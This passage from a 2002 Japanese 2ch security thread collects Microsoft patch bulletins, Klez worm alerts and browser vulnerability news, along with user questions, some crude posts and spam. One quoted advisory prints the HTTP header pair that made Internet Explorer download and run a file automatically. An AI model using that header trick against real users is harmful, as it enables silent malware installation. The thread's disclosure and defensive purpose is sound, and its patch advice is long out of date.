タイガ〜ス ♪〜
102名無しさん@お腹いっぱい。:02/04/06 01:27 ID:9La8AZVx
2000のやついまgetした
103(-_-):02/04/06 02:15 ID:DKgCinsf
【コピペ1周年】同時多発オーダーIN吉野家【祭り】
(1)馴れ合い禁止。(一人で来る事。同伴禁止:いても知らぬ顔)
(2)「大盛りねぎだくギョク」を頼むこと。(並盛りねぎだくギョクも可)
(3)各会場ごとに指定時間厳守で現地集合。
(4)食ったら即帰る。
注)吉野家は家に帰るまでが吉野家です。
http://ex.2ch.net/test/read.cgi/entrance/1017935504/l50
http://www2.mnx.jp/carvancle/yoshigyu/ 
104 ◆MUMUMU4w :02/04/07 16:38 ID:wPDr0Fp5
>>96
MS02-017のWindows2000用のパッチが出ました。

最新情報は次のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS02-017
================================================================
今回の更新内容
この問題に対する Windows 2000 の日本語版修正プログラムを公開しま
した。
================================================================
・ Windows 2000:
- PC/AT 互換機用
http://www.microsoft.com/downloads/release.asp?ReleaseID=37555
ダウンロード先のリストから Japanese Language Versionを選択してください。
- NEC PC-9800 シリーズ用
http://www.microsoft.com/downloads/release.asp?ReleaseID=37555
ダウンロード先のリストから Japanese NEC Language Versionを選択してください。
105 ◆MUMUMU4w :02/04/12 16:25 ID:S5Fmh5hr
■Microsoft IISに関するセキュリティホールの累積的修正
■対象OS: NT4/2000/XP

最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-018ov.asp

MS02-018 に関する情報
「MS02-018: Internet Information Services 用の累積的な修正プログラム
(Q319733)」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
この修正プログラムは、Internet Information Server 4.0 (IIS4.0) または
Internet Information Services 5.0/5.1 (IIS5.0/5.1) に影響を及ぼす、
セキュリティ上の問題を排除する累積的な修正プログラムです。 IIS5.0 と
IIS5.1 に関してはリリース以降に公開された全ての修正プログラム、IIS4.0
に関しては、Windows NT4.0 SP6a 以降に公開された全ての修正プログラムが
含まれています。さらに、新たに 10 個の問題を排除します。

対象となる製品
==============
・ Microsoft Internet Information Server 4.0
・ Microsoft Internet Information Services 5.0
・ Microsoft Internet Information Services 5.1

修正プログラム
==============
・ Internet Information Server 4.0 (Windows NT4.0)
・ PC/AT 互換機
http://download.microsoft.com/download/iis40/Patch/Q319733/NT4/JA/Q319733i.exe
・ Microsoft Internet Information Services 5.0 (Windows 2000)
・ PC/AT 互換機
http://download.microsoft.com/download/iis50/Patch/Q319733/NT5/JA/Q319733_W2K_SP3_X86_JA.exe
NEC PC-9800 シリーズ用修正プログラムは現在準備中です。準備ができ
次第、このページにて、お知らせします。
・ Microsoft Internet Information Services 5.1 (Windows XP)
http://download.microsoft.com/download/iis50/Patch/Q319733/WXP/JA/Q319733_WXP_SP1_x86_JPN.exe
106 ◆MUMUMU4w :02/04/12 16:43 ID:S5Fmh5hr
>>105
■このパッチの記事(IT Pro)。10種類のセキュリティホール。

□□………………………………………………………………………………………………
□◆ IISに10種類のセキュリティ・ホール,
□  サーバー上で任意のプログラムを実行される
□□………………………………………………………………………………………………
マイクロソフトは4月10日,同社Webサーバー・ソフト「Internet Information Se
rver/Services(IIS)」に10種類の新しいセキュリティ・ホールがあることを明らか
にした。影響を受けるのは IIS 4.0/5.0/5.1。最も深刻なセキュリティ・ホールを悪
用されると,Webサーバー上で任意のプログラムを実行される恐れがある。すべての
ホールをふさぐパッチが公開されているので,管理者は早急に適用する必要がある。

ソース: http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020411/1/
107名無しさん@お腹いっぱい。:02/04/13 23:20 ID:???
108名無しさん@お腹いっぱい。:02/04/14 02:26 ID:5jXHiHa2
さすがディズニー(w
Q310510 : 推奨修正プログラム
ダウンロード サイズ: 223 KB, < 1 分
この修正プログラムによって、Windows XP に存在する
「白雪姫の DVD 再生時に、再生およびコピー防止の問題が発生する」問題
(サポート技術情報 JP310510) が修正されます。
今すぐダウンロードして、ディズニーの『白雪姫デラックス版 DVD』を
再生できるようにしてください。 詳細情報...
109 ◆MUMUMU4w :02/04/16 14:00 ID:ZhqTijjO
■IEの「戻る」ボタンは危険

jbeef曰く、"15日深夜ごろBUGTRAQに流れた記事による と、IEの「戻る」ボタンを押すと、
cookieを盗まれたり、ロー カルファイルを盗まれたり、ローカルコマンドを起動された り
する危険があるとのこと。発見者のデモを試してみると、デモページの リンクを辿って
Googleサイトに飛び、そこで「戻る」ボタンを押した瞬 間、Googleサイト用のcookieが抜き
取られた。したがって、「怪しいサイト で変なリンクを辿ったら、戻ろうとせず、ウィンドウを
閉じた方がいい」と いうことになる。

ソース: http://slashdot.jp/article.pl?sid=02/04/16/0239259&mode=thread
110 ◆MUMUMU4w :02/04/16 14:07 ID:ZhqTijjO
■IISの最新パッチに一部問題、Site Serverユーザーは注意

 マイクロソフトは4月12日,Internet Information Server/Services(IIS)の最新パッチを
適用すると,Webサイトへのログインが失敗する場合があることを明らかにした。影響を
受けるのは,OS が Windows 2000 で,かつ Site Server 3.0 をインストールしている場合。
同社が公開しているパッチを適用すれば,影響を回避できる。なお,Windows 2000 SRP1
を適用している場合にも,同様の問題が発生する。

ソース: http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020415/1/
111名無しさん@お腹いっぱい。:02/04/18 06:44 ID:LCt4or9f
こ、こんな良スレがあったとは。むむむ。
112 ◆MUMUMU4w :02/04/18 14:23 ID:hID0Pq+h
■KLEZの新亜種に関する情報

*******************************************************************
    感染警報VAC-2KLEZ新亜種「WORM_KLEZ.G」
        世界規模で感染報告急増
*******************************************************************

トレンドマイクロ株式会社(本社:東京都渋谷区、代表取締役社長:
スティーブ・チャン)は、KLEZウイルスの新しい亜種「WORM_KLEZ.G」
(クレズ.G)について、国内および海外での感染被害報告の急増をうけ、
ウイルス警報VAC-2※1で警告します。弊社では既にパターンファイル
265※2以降で対応しています。また、専用駆除ツールの公開準備を
しています。

●現在の感染被害状況(2002年4月17日23時現在)
 海外:台湾10件以上、ドイツ5件以上
 国内:10件

●KLEZオリジナルおよびこれまでの亜種との違い
【ウイルスの作成ファイル】
ワームを実行した場合に、以下のファイルが作成されます。
<Windowsのシステムディレクトリ>¥WINK※.exe(「※」は無作為な文字列)
WINK※.exeはウイルス自身のコピーです。レジストリの値も変更されますので、
システム起動毎にワームが活動するようになります。

【ウイルス付e-mailの件名】
件名は、以下の候補文字列から1つまたはランダムに選択した文字列となり
ます。例えば、組み合わせによっては"Trendmicro removal tools"など弊社
などワクチンソフトメーカからのツールと思われるような件名になる場合が
あります。
件名の候補文字列については、下記URLをご参照ください。
http://www.trendmicro.co.jp/virusinfo/news2002/worm_klez_g.asp

【ウイルス付e-mailの差出人の詐称対象】
Windowsのアドレス帳およびローカルドライブ内の拡張子がMP8, EXE, SCR,
PIF, BAT, TXT, HTM, HTML. WAB, DOC, XLS, CPP, C, PAS, MPQ, MPEG,
BAK, MP3のファイルからランダムに選択したアドレスをウイルス付e-mailの
差出人(From:)にセットし、感染者が特定できないようにします。
ウイルスがもともと持っている差出人リストはありません。


■■■   WORM_KLEZ.Gの詳細については下記URL    ■■■
■■■ またはFAXBOX情報提供サービスをご参照ください  ■■■

【WORM_KLEZ.G詳細情報】
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_KLEZ.G
【ウイルス情報】
http://www.trendmicro.co.jp/virusinfo/index.asp
113 ◆MUMUMU4w :02/04/18 14:26 ID:hID0Pq+h
>>111
どうもです。とりあえず得た情報を流しているだけなので、
取り扱いは読まれた方が各位の責任にておながいします。

■SQL Server 7.0/2000に関するセキュリティホールの情報

最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-020ov.asp

MS02-020 に関する情報
「MS02-020: SQL 拡張プロシージャ機能に未チェックのバッファが含まれる
(Q319507)」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
この問題は、SQL Server に含まれる未チェックのバッファにより、不正な
プログラムが実行される可能性がある問題です。最悪の場合、悪意のある
ユーザーが攻撃の対象となるシステムで、任意のプログラムを実行することが
可能になります。

対象となる製品
==============
・ Microsoft SQL Server 7.0
・ Microsoft SQL Server 2000

修正プログラム
==============
・ Microsoft SQL Server 7.0 (Alpha)
http://download.microsoft.com/download/sql70/Patch/SP3/ALPHA/JA/7.00.1030_SQL7_sp3_alpha_jpn.exe
・ Microsoft SQL Server 2000
http://download.microsoft.com/download/SQLSVR2000/Patch/SP2/WIN98MeXP/JA/8.00.0608_SQL2K_sp2_x86_jpn.exe

注意: Microsoft SQL Server 7.0 (Intel) の日本語版修正プログラムは現在
準備中です。準備ができ次第、このページにて、お知らせします。
114 ◆MUMUMU4w :02/04/18 14:37 ID:hID0Pq+h
■マイクロソフトが出しているオペレーションズガイドの紹介

Security Operations Guide for Windows 2000 Server
http://www.microsoft.com/technet/security/prodtech/windows/windows2000/staysecure/default.asp

英語ですが、かなりきちんと書かれている模様。その筋の方は読んでおかれるといいかも。

# こういう情報も出した方がいいのかな?一応総合スレッドということで。
115名無しさん@お腹いっぱい。:02/04/18 21:15 ID:RztULd5c
116名無しさん@お腹いっぱい。:02/04/18 21:55 ID:Ag4V9hv9
>>115
漏れも今見て2chで出てるかなぁと思ってたらここにあった
もう、最低
operaもっとメジャーになってくれ、まだサポート甘いからな
とは逝ってもIEのセキュリティーホールの目白押しも痛すぎる
117名無しさん@お腹いっぱい。:02/04/18 23:14 ID:+H16FOk7
WindowsUpdateが日本語じゃなくなってるんですが
問題無いのかな
118名無しさん@お腹いっぱい。:02/04/18 23:18 ID:lJD9Zga/
>>117
私の環境からはは完璧に日本語でした。
Windows2000SP2
119 :02/04/18 23:25 ID:???
>>118
レスさんくす。俺だけみたいですね。
ちなみにOSはWin98です。
120名無しさん@お腹いっぱい。:02/04/18 23:32 ID:???
>>117
ツール→インターネットオプション→言語
で日本語以外になってない?
121117:02/04/18 23:35 ID:???
>>120
自力で気付いて直したら逝けました。
もうちょっと早く気付いて自己レスしたかった。恥ずかしい
でもさんくすでした。
122 ◆MUMUMU4w :02/04/22 17:10 ID:04vWNvdj
■Klezワームの変種に機密を暴露する機能が存在か、対策企業が注意促す

Klezワームの最新の変種に,感染したマシン内の文書を添付して送信する機能があり,
機密文書の漏洩につながる恐れがあると,ウイルス対策企業が注意を促している。
(以上、2002年4月22日のZDNNより引用―全文はソースで)

ソース: http://www.zdnet.co.jp/news/0204/22/e_klez.html

(注)今後「全文転載してもよい」ということが明記されていないソースをの場合、
ソースからの一部引用、日付と引用先の明示、引用先リンクの表示にとどめる
こととします。(◆MUMUMU4w)
123 ◆MUMUMU4w :02/04/23 23:43 ID:zyeZpiKE
■オープンループなど、セキュリティーパッチなどを自動更新するサービスを開発
■URL
http://www.openloop.co.jp/press/release/020423.html
http://www.openloop.co.jp/product/patchwiz/index.html
http://www.ami.co.jp/press/index.htm

 株式会社オープンループとアクセス メディア インターナショナル株式会社は、
WindowsやInternet Explorerなどを最新版に自動的に更新するソフト「PatchWiz」を
共同開発し、これを利用した更新サービス「WizService」の提供を6月より開始する。

 PatchWizは、マイクロソフトやオープンループのパッチ適用データベースを参照して、
ユーザーのPCに導入されている「Windows」と「IE」に必要なセキュリティーパッチなどを
自動で適用するソフト。マシンのBIOSや導入されているアプリケーションを自ら調査
するので、マシン毎に機種やメーカーなどが異なっていても最善のパッチをインストール
することが可能だ。対応OSは、「Windows 2000/XP」となる。

 更新サービスWizServiceは、自動更新ソフトPatchWizをクライアントマシンにインストール
して利用する。
(以上、2002年4月23日のInternet Watchより一部引用―全文は引用元を参照)

引用元: http://www.watch.impress.co.jp/internet/www/article/2002/0423/open.htm
ナマでパコパコやるな!!!!

インターネット=ソープランドのマンコ
パソコン=チンコ

これでもナマでヤリますか?

淋、蔵まみれになりますか?

ノートン買え!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!

ソープランドを貶める意図はありません。

このくらい言わないと重大さが解らないか?
ウイルス対策をしないのはチンコにゴムつけないのと同じです。

ソープランドで淋、蔵くらうことがあります。
別にスレがあります。
125 ◆MUMUMU4w :02/04/24 22:54 ID:9wvHP3z1
■トレンドマイクロからのKLEZ_Eに関するアナウンス

━━■ ウイルス警告 ■━━━━━━━━━━━━━━━━━━━━━━━━
■■クレズE(WORM_KLEZ.E)の破壊活動:5/6にご注意ください■■
専用対策Webを公開し警告していますクレズEは感染すると、パソコンの日付が
奇数月(1月/3月/5月/7月/9月/11月)の 6 日に特定の拡張子のファイルを
「ゴミ」データ(不定な文字列・スペース等)で上書きする活動を試みます。
ご注意ください。詳細は対策Web、ウイルスデータベースをご覧ください。

●クレズE / クレズG対策Web: http://www.trendmicro.co.jp/klez/
●ウイルスデータベース:
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_KLEZ.E

※この奇数月6日の破壊活動はクレズEに感染している場合に発生します。
クレズGはこの破壊活動をおこないません。
なお、この破壊活動は奇数月6日にコンピュータを起動しなければおこ
なわれることはありません。
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
126名無しさん@お腹いっぱい。:02/04/25 01:54 ID:Wo6x8/9O
セキュリティ総合と書いてあるのでここでお伺いしてよいのかなと思いました。
Targetっていうタイトルのメールが二通ばかしきたんですけど、本文も添付ファイルもなし。
削除したら、削除済みファイルにははいっていなくて、、これはウイルスメールなのですか?
127名無しさん@お腹いっぱい。:02/04/25 02:29 ID:???
>>126
おそらくKlez.Eです。Outlook Expressをお使いでしたら
感染している可能性があります。
Klez系,Klez.Eスレッド
http://pc.2ch.net/test/read.cgi/sec/1018248786/

214 :cheshire-cat :02/04/24 20:21
できた。あとはご自由にアレンジして下さいな。

感染したなら即WEBから切り離すべし、接続しているだけで被害者増える。
知人の怨み、買いたいですか?
上司の視線、冷たくないか?

Outlook Expressでプレビューしただけで、Outlookで開いただけで感染
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS01-020

件名、添付ファイル名、ウイルス名から検索するならここで。
http://www.symantec.com/region/jp/sarcj/vinfodb.html
http://www.trendmicro.co.jp/vinfo/

体験版&お試し版
http://www.vintage-solutions.com/Japanese/Antivirus/Super/
http://www.symantec.com/region/jp/trial/trial.html
http://www.trendmicro.co.jp/trial/index.asp

オンライン検索(Active Xを有効にしないと使えない。使うなら覚悟の上で)
注意:WEBに接続すると感染パソから被害者イパーイ出す可能性があるんで、注意
http://www.trendmicro.co.jp/hcall/index.asp
128 ◆MUMUMU4w :02/04/26 13:17 ID:+RoFI+Q3
■Outlook2000/2002(+Word)に新たなセキュリティホール

最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-021ov.asp

MS02-021 に関する情報
「MS02-021: 電子メール エディタの問題により、返信または転送でスクリプ
トが実行される(Q321804)」 に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
この問題は、Microsoft Outlook をご利用のお客様に影響があります。
電子メールの編集の際に Microsoft Word を使用するように設定している
お客様が、HTML メールを返信、または、転送する際にメールに含まれるスク
リプトが実行される可能性があります。最悪の場合、悪意のあるユーザーが
攻撃の対象となるシステムで、任意のスクリプトを実行することが可能になり
ます。

対象となる製品
==============
・ Microsoft Outlook 2000
・ Microsoft Outlook 2002

修正プログラム
==============
本問題は、Outlook をご利用いただいているお客様に影響がございますが、
この問題の原因は Microsoft Word 側にあります。 そのため、この問題を
修正するには、 Microsoft Word の修正プログラムをご適用ください。
Microsoft Outlook 用の修正プログラムは必要ありません。

・ Microsoft Word 2002
http://download.microsoft.com/download/Word2002/Patch/wrd1003/W982KMeXP/EN-US/wrd1003.exe
・ Microsoft Word 2000
http://download.microsoft.com/download/word2000/Patch/wrd0901/WIN98MeXP/EN-US/wrd0901.exe

本問題の修正に関しては、影響の受ける製品ではなく Microsoft Word の修正
により対応しております。

詳細
====
この問題を利用して、下記の攻撃が考えられます。

悪意のあるユーザーが、メールの受信者に任意のスクリプトを実行させること
が可能です。

この問題は、Outlook の 電子メールの編集に Microsoft Word を利用してい
る環境で、リッチテキスト、または、HTML 形式のメールを返信、または、
転送すると、Outlook が使用している Internet Explorer のセキュリティ
ゾーン の設定を無視してスクリプトが実行されます。
対策が行われていないシステムは、この問題を利用した悪影響を受けることが
あります。
この攻撃は、ハッカーまたはクラッカーと呼ばれる悪意のあるユーザーや、
ワームといった自動的な攻撃を目的とした悪意のあるプログラムから行われる
ことがあります。

日本語による詳細については、ただいま準備中です。
それまでの間、英語情報をご参照ください。
129虹男:02/04/27 02:51 ID:uq3DfzFW
困っております・・・。

YOU_ARE_FAT.MP3.scrってBadTransUってAVGが言いました。
BadTransBのことでしょうか?GENIO eを購入してActiveSyncを
インストールして母艦と同期し始めたらMicrosoft LDAP Directory
というのが出てきてなんのことだかわかりません。同期のときに
AVGが発見してそのウイルスは処理しちゃいましたが。このLDAP
とかいうものをちゃんと把握したいのですが調べてもわかりません。
ちゃんと把握して必要ならきちんと設定したいと考えています。
ここで聞くのはスレ違いなのかもしれませんがご指南願います。
LDAP Directoryのサーバー名・ユーザー名には”NULL”となってい
ます。過去レスにこれはまずいと書かれていたのを見ました。

厨ですいません。よろしく願います。
130名無しさん@お腹いっぱい。:02/04/27 02:59 ID:???
131虹男:02/04/27 03:08 ID:uq3DfzFW
>>130

レスありがとうございます。Microsoft LDAPで検索するんですね。
しかし、どこをどう見ていいのか、アウトルック2002にどう
関連するのか、わからないですー・・・。よかったらもう一歩突っ
込んだところお願いします。よろしくですー。
すごい(・∀・)イイ! スレハッケソ
ありがたいね。
こんなに、IEに穴があるとは・・・・
133名無しさん@お腹いっぱい。:02/04/27 20:22 ID:???
>>131
初心者スレ行けクズ
134 ◆MUMUMU4w :02/05/01 12:13 ID:KAD+gXJn
■Netscape/Mozillaにローカルファイル読みとりの脆弱性

jbeef曰く、"4月30日にBUGTRAQに投稿された記事によると、 Netscape 6およびMozillaに
ローカルファイルの読み出しが可能なセキュリティホールがあるとのこと。この欠陥は、
MS02-008で修正されたIEのXMLHTTPの脆弱性のときと全く同じ方法で攻撃できてしまう
ものだとか。
(以上、2002年5月1日のSlashdot Japanより一部引用―全文は引用元を参照)

引用元: http://slashdot.jp/article.pl?sid=02/05/01/0151233
135名無しさん@お腹いっぱい。:02/05/01 16:41 ID:iQTNTbsb
PCWatchにも出た

NetscapeとMozillaにセキュリティーホール発覚

〜ローカルファイルのリストが読み出し可能に
http://www.watch.impress.co.jp/internet/www/article/2002/0501/grey.htm

>またNetscapeは、ブラウザーにローカルコードを実行できるような
>危険なバグが見つかった場合に1,000ドルを支払うという
>「Bug Bounty Program」を実施しているが、GreyMagicはこのバグに
>ついて「Netscapeに連絡したものの一切連絡がない」とその対応の
>悪さを激しく糾弾している。

このあたりが今後楽しみ
136 ◆MUMUMU4w :02/05/04 18:18 ID:ohAzUimv
■FlashのActiveXプラグインに脆弱性

k3c曰く、 "BugTraqへの投稿によれば、Macromedia FlashのActiveXプラグインである
Flash.ocxのバージョン6.0r23以前にバッファオーバーフローの脆弱性があり、この脆弱性
を突いたコードを含んだHTMLをIEで表示させる (Outlook ExpressなどIEコンポーネントを
使った他のプログラムでもよい) ことで、FlashのActiveXプラグインを通してそのコードを
実行させることができるそうです。Macromediaからは既に対策済みのバージョン (6.0r29)
がダウンロードできます。

以前、Flashムービー形式のウイルスというのをタレコみましたが、これは感染にFlash
プレイヤーが必須だったのに対して、今度の脆弱性はIEのFlashプラグインがあれば
被害を受けます。
(以上、2002年5月4日のSlashdot Japanより一部引用―全文は引用元を参照)

引用元: http://slashdot.jp/article.pl?sid=02/05/03/1752220
137名無しさん@お腹いっぱい。:02/05/04 20:04 ID:???
>>136
対策版URLはこちら。
http://www.macromedia.com/jp/shockwave/download/?P1_Prod_Version=ShockwaveFlash&Lang=Japanese


しかし、/.J発のタレコミ最近多いね。
138 ◆MUMUMU4w :02/05/06 00:57 ID:LUjrOWH7
>>137
どうも。確かに/.J発が最近多いかも。というか元はbugtraqか。
bugtraqは玉石混交で有用な情報を拾うのが結構面倒だったりするので、
拾ってくれる人がいるのは有難いかも。
139 :02/05/06 01:04 ID:???
140名無しさん@お腹いっぱい。:02/05/09 15:48 ID:fLRqhCyK
最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-022ov.asp

MS02-022 に関する情報
「MS02-022: MSN チャット コントロールの未チェックのバッファにより
コードが実行される(Q321661)」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
この問題は、MSN チャットに含まれる未チェックのバッファにより、不正な
プログラムが実行される可能性がある問題です。最悪の場合、悪意のある
ユーザーがお客様のコンピューター上で任意のプログラムを実行することが
出来ます。

対象となる製品
==============
・ Microsoft MSN Chat (MSN チャット)
MSN チャットは、こちら <http://chat.msn.co.jp/> のサイトで公開され
ているチャットサービスをご利用いただく際にインストールする必要のある
Active X コントロールです。そのため、今までに MSN チャットをご利用
いただいたことのある全てのお客様が対象となります。

・ Microsoft MSN Messenger
MSN Messenger には、Microsoft MSN Chat (MSN チャット) が含まれて
います。そのため、MSN Messengerをご利用いただいている全てのお客様が
対象となります。

・ Microsoft Exchange Instant Messenger
Microsoft Exchange Instant Messenger 4.5 以降には、Microsoft MSN
Chat (MSN チャット) が含まれています。そのため、Microsoft Exchange
Instant Messenger ご利用いただいている全てのお客様が対象となります。

注意 : この問題の影響を受けるのは以下の組み合わせで上記製品が
インストールされている場合です。

・ Microsoft MSN Chat (MSN チャット) のみ
・ Microsoft MSN Messenger のみ
・ Microsoft Exchange Instant Messenger のみ
・ Microsoft MSN Chat (MSN チャット) と Microsoft Windows Messenger
(Windows XP に付属)

修正プログラム
==============
・ Microsoft MSN Chat (MSN チャット)
http://download.microsoft.com/download/chat/Patch/4.1/W98XP/EN-US/MSNChatSecFix.exe

ご自身の環境で、MSN チャットや、MSN Messenger 等を利用しているかどうか
わからない場合には、念のため、修正プログラムを適用することをお勧めいた
します。
本修正プログラムは MSN チャットがインストールされている場合にのみ実行
されます。そのため、お客様の環境で MSN チャットがインストールされて
いない場合には、本修正プログラムによって影響を受けることはありません。
141むむむ ◆MUMUMU4w :02/05/16 12:11 ID:rsZAKx7j
■MS02-023 : 2002年5月15日 Internet Explorer 用の累積的な修正プログラム (Q321232)

最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-023ov.asp

MS02-023 に関する情報
「MS02-023 : 2002年5月15日 Internet Explorer 用の累積的な修正プログラ
ム (Q321232)」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
この修正プログラムは、Internet Explorer に影響を及ぼすセキュリティ上の
問題を排除する累積的な修正プログラムです。
以前に公開されたMS02-015 : 2002 年 3 月 28 日 Internet Explorer 用の
累積的な修正プログラムで修正された問題に加えて、新たに 6 つの問題を
排除します。

対象となる製品
==============
・Internet Explorer 6
・Internet Explorer 5.5 Service Pack 2
・Internet Explorer 5.5 Service Pack 1
・Internet Explorer 5.01 Service Pack 2 (Windows 2000 、
Windows NT4.0 に組み込まれているもののみ)
注意: Internet Explorer 5.01 Service Pack 2 の修正プログラムは、
Windows 2000 、Windows NT4.0 Service Pack 6a 環境でのみ適用可能です。

修正プログラム
==============
・Internet Explorer 6
http://download.microsoft.com/download/IE60/secpac27/6/W98NT42KMeXP/JA/q321232.exe
・Internet Explorer 5.5 SP2 and Internet Tools
http://download.microsoft.com/download/ie55sp2/secpac27/5.5_sp2/W98NT42KMe/JA/q321232.exe
・Internet Explorer 5.5 SP1 and Internet Tools
http://download.microsoft.com/download/ie55sp1/secpac27/5.5_sp1/W98NT42KMe/JA/q321232.exe
・Internet Explorer 5.01 SP2
http://download.microsoft.com/download/ie501sp2/secpac27/5.01_sp2/NT45/JA/q321232.exe
142名無しさん@お腹いっぱい。:02/05/16 17:03 ID:PGh0wTBh
>>141
サンクス
Windows Updateでも更新できるみたいだね。
http://windowsupdate.microsoft.com/
143名無しさん@お腹いっぱい。:02/05/16 17:31 ID:qpGqZEre
>>141>>142
サンクスです
144むむむ ◆MUMUMU4w :02/05/16 22:03 ID:rsZAKx7j
>>141 の参考情報。
----------------------------------------------------------------------
SNS Advisory No.48
Microsoft Internet Explorer Still Download And Execute ANY Program Automatically

Problem first discovered: Wed, 13 Feb 2002
Published: Mon, 18 Mar 2002
Revised: Thu, 16 May 2002
----------------------------------------------------------------------
概要:
-----
Microsoft Internet Explorer には、さまざまな環境下においてユーザの
意思に関係なく、ファイルを自動的にダウンロードし、かつ、それを自動的
に実行してしまう問題があります。悪意ある Web サイトの管理者はこの問
題を利用することのできる悪意あるコンテンツを設置し、後述の環境に該当
するユーザが Internet Explorer を利用してこのコンテンツにアクセスし
た場合に、この管理者が指定した任意のプログラムはユーザのシステム上に
自動的にダウンロードされ、かつ、自動的に実行されてしまう可能性があり
ます。

詳細:
-----
Microsoft Internet Explorer には、さまざまな環境下において HTTP 応答
中に含まれる次のようなヘッダを含むコンテンツにアクセスした場合、ファ
イルを自動的にダウンロードし、かつ、それを自動的に実行してしまう問題
があります。

Content-Type: audio/x-ms-wma
Content-disposition: inline; filename="foo.exe"

ただしこれは一例であり、他の Content-Type: ヘッダ、例えば
Content-Type: audio/midi などの指定によっても可能であることを確認し
ております。

次に、我々が問題が発生しうると確認した環境は、以下のような環境です。
以前に公開した我々のアドバイザリでは、IE 6 のみがこの問題の影響を受
ける可能性があるとしましたが、その後の調査により、IE 5.01 SP2 もこの
問題の影響を受ける可能性があることを確認しました。
(以下略、全文は以下のURLを参照)
再配布について:
---------------
このアドバイザリの再配布は、下記条件を満たす限り自由です。
・発行元 URL として、以下の URL を明記する。
http://www.lac.co.jp/security/intelligence/SNSAdvisory/48.html
145むむむ ◆MUMUMU4w :02/05/17 23:40 ID:7KeBdsJW
[セキュリティー]
----------------------------------------------------------------------------
09:「MicrosoftのIEパッチは不完全」セキュリティー専門家が指摘
----------------------------------------------------------------------------
http://sec.greymagic.com/news/
http://www.microsoft.com/windows/ie/downloads/critical/q321232/default.asp

 米Microsoftは15日、Internet Explorer(IE)の6つの深刻な脆弱性を修正するた
めのパッチを公開したが、一部のセキュリティー専門家は、このパッチはこれらの脆
弱性による問題をすべて解消するわけではないと指摘している。
 このパッチは、IE 5.01〜6と電子メール・クライアント「Outlook」に影響するク
ロスサイト・スクリプティングの脆弱性などのセキュリティーおよびプライバシー保
護上の不具合を修正するように設計されている。
 だが、セキュリティー研究者のソア・ラーホルム氏とイスラエルのセキュリティー
会社GreyMagic Softwareは、同パッチのリリース後にセキュリティー・メーリング・
リスト「Bugtraq」にメッセージを投稿し、同パッチはクロスサイト・スクリプティ
ングの脆弱性については、影響するブラウザのうち1つのバージョンに関して問題を
修正するにすぎないと指摘している。
(以上、2002年5月17日配信のInternet Watchより引用)
146名無しさん@お腹いっぱい。:02/05/18 00:06 ID:pDdXB+p3
>>145
当てても意味のないパッチなのか・・・

ま、とりあえず当てとくか・・・
147http://nara.cool.ne.jp/mituto:02/05/18 11:34 ID:iDqfA/st
「ランゲージ・クライシス」および「間違いだらけの科学法則」はいずれも田中洸人氏の革新的な考え方がにじみ出ているサイトです。
http://nara.cool.ne.jp/mituto              
148むむむ ◆MUMUMU4w :02/05/21 10:55 ID:kTZFYWLe
# 若干旧聞ですが。

◆Operaにセキュリティ・ホール,Cookieやファイルを読み取られる恐れあり

 Windows版 Opera のバージョン 5.12/6.0/6.01 に深刻なセキュリティ・ホールが
見つかっている。ある“細工”が施されたWebページを閲覧すると,ユーザーのCook
ieやファイル,閲覧したWebページの履歴情報などを読み取られる恐れがある。

続き(全文)は,
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020517/2/
でお読みいただけます。
(以上、IT Pro-Report 2002.05.20 メールより引用)
149むむむ ◆MUMUMU4w :02/05/21 23:24 ID:sNoohwwZ
◆【今週のSecurity Check】IE 5.01/5.5 ユーザーは要注意,
パッチでは修正できないホールが存在

 またもやInternet Explorer(IE)のセキュリティ・ホールが複数公開された。パ
ッチも公開されたものの,適用しても解消できないセキュリティ・ホールがIE 5.01
/5.5には存在する。「IE 6だけが影響を受ける」とされていたセキュリティ・ホール
の一つが,IE 5.01/5.5にも影響を与えることが,パッチ公開後に明らかになったか
らだ。「お勧め設定」を施せば回避可能だが,IE 5.01/5.5 ユーザーは十分注意が必
要だ。

続き(全文)は,
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20020521/1/
でお読みいただけます。
(以上、IT Pro-Report 2002.05.21 メールより引用)
1501192:02/05/22 00:27 ID:m9ltbDmb
>>149
パッチあてたばかりなのに・・・。
151名無しさん@お腹いっぱい。:02/05/22 00:28 ID:wfXKzdof
>>149
読めないんですが。。。そのリンク先。。。
152むむむ ◆MUMUMU4w :02/05/22 00:38 ID:FiGl53/h
>>151
会員登録(オンラインで可能: 無料)が必要ですね。
いちおう会員のみの情報なので、引用は控えます。
153むむむ ◆MUMUMU4w :02/05/22 00:40 ID:FiGl53/h
Anonymous Coward曰く、"memo MLに02/05/21に投稿された記事によると、
各社のPCに搭載されているCyberSupportに脆弱性が発見された模様。現在、
少なくともSONY用、日立用、東芝用、NEC用の告知とパッチがジャストシステム
のサイト上にある。特にVAIOは、以前にあった『VAIOのプリインストール
